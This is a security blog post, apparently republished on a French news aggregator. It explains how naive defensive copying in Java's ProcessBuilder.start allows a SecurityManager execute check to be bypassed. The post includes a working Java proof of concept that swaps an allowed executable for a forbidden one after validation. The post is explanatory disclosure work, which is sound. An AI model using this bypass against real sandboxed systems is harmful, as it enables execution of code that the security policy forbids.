|
|
|
Defensive Copying - How not to do it |
Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Présentation : Defensive Copying Sun Secure Coding Guidelines talks about defensive copying of input and output, to protect against modifications that occur after validation. Let's look at one Sun implementation from the java.lang package, no less as an example of how not to do it. ProcessBuilder java.lang.ProcessBuilder, as the javadoc puts it, is used to create operating system processes . You give it a process name, parameters, environment variables and call the start method to execute the process. The start method is defined as follows 435 public Process start throws IOException 436 Must convert to array first -- a malicious user-supplied 437 list might try to circumvent the security check. 438 String cmdarray command.toArray new String command.size 439 for String arg cmdarray 440 if arg null 441 throw new NullPointerException 442 Throws IndexOutOfBoundsException if command is empty 443 String prog cmdarray 0 444 445 SecurityManager security System.getSecurityManager 446 if security null 447 security.checkExec prog 448 449 String dir directory null 450 451 try 452 return ProcessImpl.start cmdarray, 453 environment, 454 dir, 455 redirectErrorStream 456 catch IOException e 457 It's much easier for us to create a high-quality error 458 message than the low-level C code which found the problem. 459 throw new IOException 460 Cannot run program prog 461 dir null 462 e.getMessage , 463 e 464 465 The interesting bit is this 436 Must convert to array first -- a malicious user-supplied 437 list might try to circumvent the security check. 438 String cmdarray command.toArray new String command.size At first glance it might seem like the work of a security conscious programmer. But quoting fictional Bob, from my previous post on immutability Bob Now you're calling toArray on a List object that you can't really trust. It could return an array and keep a reference to that array for itself for future modification. And that's exactly the case here, too. One doesn't even need to get into a tricky situation where a secondary thread keeps modifying the contents of the array you can simply take advantage of the fact that between the validation on the array and the actual use of the array there's a call to another user supplied object, a File object in the directory field. So you could initially pass a safe.exe as the program, pass the validation of ProcessBuilder.start, and when the code calls File.toString on the File object that's under your control, you set the first index of the String array as evil.exe . Example Let's create a fictional situation, where the security policy allows the execution of C windows system32 notepad.exe and disallows the execution of any other executable. We achieve this by creating a policy file as follows name it notepad.policy for example grant permission java.io.FilePermission C windows system32 notepad.exe , execute To enable a security manager for a standalone Java application and to use this policy we just created, always execute java with the following JVM options -Djava.security.manager -Djava.security.policy notepad.policy In order to test it, try executing calc.exe 001 002 003 public class PBCalc 004 public static void main String args throws Exception 005 ProcessBuilder pb new ProcessBuilder C windows system32 calc.exe 006 pb.start 007 008 If the security manager and our policy have been successfully configured that should result in Exception in thread main java.security.AccessControlException access denied java.io.FilePermission C windows system32 calc.exe execute at java.security.AccessControlContext.checkPermission AccessControlContext.java 323 at java.security.AccessController.checkPermission AccessController.java 546 at java.lang.SecurityManager.checkPermission SecurityManager.java 532 at java.lang.SecurityManager.checkExec SecurityManager.java 779 at java.lang.ProcessBuilder.start ProcessBuilder.java 447 at PBCalc.main PBCalc.java 6 Executing notepad.exe should work ok 001 002 003 public class PBNotepad 004 public static void main String args throws Exception 005 ProcessBuilder pb new ProcessBuilder C windows system32 notepad.exe 006 pb.start 007 008 And finally, exemple of the exploitation of the naive defensive copying. We create a List object whose toArray method returns a reference to a String array while keeping a handle to said String array. Initially the String array has notepad.exe as the executed process, but once we pass the validation and ProcessBuilder calls toString of our anonymous subclass of File object toString method, we switch the executable as calc.exe. 001 import java.io.File 002 import java.util.ArrayList 003 import java.util.List 004 005 public class PBMutable 006 public static void main String args throws Exception 007 final String str C windows system32 notepad.exe 008 List list new ArrayList 009 public Object toArray Object a 010 return str 011 012 013 014 ProcessBuilder pb new ProcessBuilder list 015 pb.directory new File . 016 public String toString 017 str 0 calc.exe 018 return super.toString 019 020 021 022 pb.start 023 024 Finally This isn't really usable in the applet sandbox world, as unsigned applets by default don't have any execution rights, but you should be aware that because of the naive defensive copying, granting any file execute permission you'll be granting the permission to execute anything at all.
Les derniers articles du site " Slightly Random Broken Thoughts" :
- Java 6 update 26 is out
- Inflated Java Malware Infection Rates
- Oracle Java Applet Clipboard Injection Remote Code Execution Vulnerability
- Java JFileChooser Programmatic Manipulation Vulnerability
- Trusted Method Chaining for Network Interface details
- Trusted Method Chaining to a System.exit
- Hazards of Duke
- Java 6 Update 22 is out
- Breaking Defensive Serialization
- Why Complex Powerful is a bad combination for security
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.191.75.173 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.191.75.173 to any 80"
- Nous contacter par mail
| Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
| Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
| Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
| Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|
